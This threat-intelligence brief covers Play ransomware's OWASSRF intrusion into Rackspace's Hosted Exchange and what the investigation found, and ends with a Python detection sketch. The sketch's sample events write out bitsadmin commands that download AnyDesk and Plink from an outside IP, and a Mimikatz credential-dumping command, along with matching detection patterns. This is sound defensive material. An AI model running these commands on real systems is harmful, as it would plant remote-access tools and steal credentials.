Rackspace Confirms Data Impact from Play Ransomware Attack
Category: Data Breach | Industry: Technology | Level: Tactical | Source: Rackspace
Rackspace's forensic investigation, conducted with CrowdStrike, into the security incident in its Hosted Exchange environment has been completed. The investigation identified the Play ransomware gang as the perpetrators of the attack: the operators used OWASSRF, a bypass of the ProxyNotShell mitigations that CrowdStrike recently reported. Using the OWASSRF exploit, the threat actors targeted CVE-2022-41080, a critical Microsoft Exchange vulnerability, to elevate their privileges and bypass the ProxyNotShell URL rewrite mitigations, and then achieved remote code execution by exploiting CVE-2022-41082. Further post-exploitation activity from the investigation was not shared; however, per CrowdStrike's original blog, the threat actors could have downloaded remote access tools such as AnyDesk and Plink using BitsAdmin and used Mimikatz for credential access following exploitation via OWASSRF.
Rackspace confirms the Play ransomware operators accessed customer email data. Of "the nearly 30,000 customers on the Hosted Exchange email environment at the time of the attack, the forensic investigation determined the threat actor accessed a Personal Storage Table ("PST") of 27 Hosted Exchange customers. We have already communicated our findings to these customers proactively, and importantly, according to CrowdStrike, there is no evidence that the threat actor actually viewed, obtained, misused, or disseminated emails or data in the PSTs for any of the 27 Hosted Exchange customers in any way." Rackspace has already contacted the impacted customers, and any customer not receiving communication from Rackspace "can be assured that their PST data was not accessed by the threat actor."
Rackspace is also progressing through the data recovery process for its hosted Microsoft Exchange data and is notifying customers if the recovery of their mailbox data exceeds 50%. The data recovery applies only to historical data prior to the date of the attack on December 2nd, 2022. Lastly, Rackspace announced that "the Hosted Exchange email environment will not be rebuilt as a go-forward service offering," as the cloud computing company had planned, prior to the security incident, to migrate to Microsoft 365. Customers impacted by the attack had already been migrated to Microsoft 365, which accelerated the organization's plans.
Anvilogic Use Cases:
- BITSadmin Abuse for Host Compromise
- ReverseShell Upgrade From WebShell
- Potential ProxyShell
- Mimikatz Execution
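The post-exploitation chain described above (BitsAdmin fetching AnyDesk or Plink, then Mimikatz for credential access) maps directly onto the BITSadmin, WebShell and Mimikatz use cases listed. The following is an added detection sketch, not Anvilogic's or Rackspace's code: it evaluates those three conditions over constructed Sysmon-style process-creation events, and the hosts, paths and rule names are assumptions made for the example.

```python
import re

# Constructed Sysmon-style process-creation events (Event ID 1 fields),
# not telemetry from the Rackspace investigation. Hosts and paths are made up.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c bitsadmin /transfer job /download /priority high "
                r"http://198.51.100.7/anydesk.exe C:\Users\Public\anydesk.exe"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer u /download http://198.51.100.7/plink.exe C:\ProgramData\p.exe"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Users\Public\m.exe",
     "cmdline": r'm.exe "privilege::debug" "sekurlsa::logonpasswords" exit'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /list /allusers"},   # benign admin use, should not fire
]

RAT_NAMES = ("anydesk", "plink")                        # tools named in the CrowdStrike write-up
MIMIKATZ = re.compile(r"sekurlsa::|privilege::debug|lsadump::|kerberos::", re.I)
EXCHANGE_PARENTS = ("w3wp.exe", "umworkerprocess.exe")  # IIS / Exchange worker processes


def classify(event):
    """Return the rule names an event matches, in evaluation order (empty if none)."""
    hits = []
    cmd = event["cmdline"].lower()
    # BITSAdmin used as a downloader: /transfer <job> /download <url> <local path>
    if "bitsadmin" in cmd and "/transfer" in cmd and "/download" in cmd:
        if any(name in cmd for name in RAT_NAMES):
            hits.append("bitsadmin_rat_download")
        else:
            hits.append("bitsadmin_download")
    # Mimikatz module syntax on the command line, whatever the binary was renamed to
    if MIMIKATZ.search(cmd):
        hits.append("mimikatz_execution")
    # Web-shell style lineage: anything suspicious spawned under an Exchange worker
    if hits and event["parent"].lower().endswith(EXCHANGE_PARENTS):
        hits.append("spawned_from_exchange_worker")
    return hits


def scan(events):
    """Map event index -> matched rules, for events that fired at least one rule."""
    findings = {}
    for index, event in enumerate(events):
        if hits := classify(event):
            findings[index] = hits
    return findings
```

Running `scan(SAMPLE_EVENTS)` flags the two BitsAdmin downloads and the Mimikatz invocation and leaves the `/list` command alone; the first download is additionally tagged because its parent is the IIS worker that hosts Exchange web endpoints.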